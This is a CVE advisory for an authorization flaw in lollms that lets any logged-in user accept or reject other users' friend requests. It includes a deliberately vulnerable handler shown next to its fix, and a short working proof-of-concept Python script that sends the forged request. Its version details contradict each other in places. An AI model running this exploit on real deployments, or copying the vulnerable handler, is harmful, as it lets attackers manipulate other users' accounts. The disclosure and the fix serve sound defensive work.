Security Vulnerability Report
CVE-2026-0562 CVSS 8.3 HIGH

Published: 2026-03-29 18:16:14
Last Modified: 2026-04-22 16:16:53

Description

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The `respond_request()` function in `backend/routers/friends.py` does not implement proper authorization checks, enabling Insecure Direct Object Reference (IDOR) attacks. Specifically, the `/api/friends/requests/{friendship_id}` endpoint fails to verify whether the authenticated user is part of the friendship or the intended recipient of the request. This vulnerability can lead to unauthorized access, privacy violations, and potential social engineering attacks. The issue has been addressed in version 2.2.0.
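The missing check described above, shown as an added illustration in plain Python rather than the project's own code: the vulnerable handler fetches the friend request by id alone, while the hardened one also requires the caller to be the request's intended recipient and rejects repeat answers. The store, exception classes, user ids and request id are constructed for the example.

```python
from dataclasses import dataclass


class NotFound(Exception):
    """Maps to HTTP 404."""


class Conflict(Exception):
    """Maps to HTTP 409: the request was already answered."""


@dataclass
class FriendRequest:
    id: int
    sender_id: int
    recipient_id: int
    status: str = "pending"


def sample_store():
    # Constructed sample data: request 12345 was sent by user 7 to user 42.
    return {12345: FriendRequest(12345, 7, 42)}


def respond_request_vulnerable(store, current_user_id, friendship_id, status):
    # Authorization gap: the request is looked up by id only and
    # current_user_id is never compared against it, so any authenticated
    # user can accept or reject a request that belongs to someone else.
    req = store.get(friendship_id)
    if req is None:
        raise NotFound
    req.status = status
    return req


def respond_request_fixed(store, current_user_id, friendship_id, status):
    if status not in ("accepted", "rejected"):
        raise ValueError("status must be 'accepted' or 'rejected'")
    req = store.get(friendship_id)
    # Ownership check: only the intended recipient may answer. A request
    # that exists but belongs to another user gets the same 404 as a
    # missing one, so the endpoint does not reveal which ids exist.
    if req is None or req.recipient_id != current_user_id:
        raise NotFound
    if req.status != "pending":
        raise Conflict
    req.status = status
    return req


def raises(exc, fn, *args):
    """True if fn(*args) raises exc; used to check the denied paths."""
    try:
        fn(*args)
    except exc:
        return True
    return False
```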

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:lollms:lollms:*:*:*:*:*:*:*:* - VULNERABLE
parisneo/lollms < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target API endpoint
url = "http://target.com/api/friends/requests/{friendship_id}"

# Attacker's authenticated headers
headers = {
    "Authorization": "Bearer <attacker_jwt_token>",
    "Content-Type": "application/json"
}

# The ID of a friend request belonging to another victim
victim_request_id = 12345

# Payload to accept or reject the request
payload = {
    "status": "accepted"  # or "rejected"
}

# Send the malicious request
response = requests.post(url.format(friendship_id=victim_request_id), json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Successfully manipulated the friend request.")
else:
    print("[-] Failed to exploit the vulnerability.")

Weakness

CWE-863 (Incorrect Authorization)

References

https://github.com/parisneo/lollms/commit/c46297799f8e1e23305373f8350746b905e0e83c (Patch)
https://huntr.com/bounties/6aab01ca-a138-4a1d-bef9-3bce145359bf (Exploit, Issue Tracking, Third Party Advisory)
https://aydinnyunus.github.io/2026/04/18/idor-lollms-friend-request-cve-2026-0562/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0562", "sourceIdentifier": "[email protected]", "published": "2026-03-29T18:16:14.460", "lastModified": "2026-04-22T16:16:52.583", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The `respond_request()` function in `backend/routers/friends.py` does not implement proper authorization checks, enabling Insecure Direct Object Reference (IDOR) attacks. Specifically, the `/api/friends/requests/{friendship_id}` endpoint fails to verify whether the authenticated user is part of the friendship or the intended recipient of the request. This vulnerability can lead to unauthorized access, privacy violations, and potential social engineering attacks. The issue has been addressed in version 2.2.0."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad crítica en las versiones de parisneo/lollms hasta la 2.2.0 permite a cualquier usuario autenticado aceptar o rechazar solicitudes de amistad pertenecientes a otros usuarios. La función 'respond_request()' en 'backend/routers/friends.py' no implementa comprobaciones de autorización adecuadas, lo que permite ataques de Referencia Directa a Objeto Insegura (IDOR). Específicamente, el endpoint '/api/friends/requests/{friendship_id}' no verifica si el usuario autenticado es parte de la amistad o el destinatario previsto de la solicitud. Esta vulnerabilidad puede conducir a acceso no autorizado, violaciones de la privacidad y posibles ataques de ingeniería social. 
El problema ha sido abordado en la versión 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lollms:lollms:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.0", "matchCriteriaId": "7118851E-5C3C-499B-BBB5-0327B7FD85AF"}]}]}], "references": [{"url": "https://github.com/parisneo/lollms/commit/c46297799f8e1e23305373f8350746b905e0e83c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/6aab01ca-a138-4a1d-bef9-3bce145359bf", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://aydinnyunus.github.io/2026/04/18/idor-lollms-friend-request-cve-2026-0562/", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}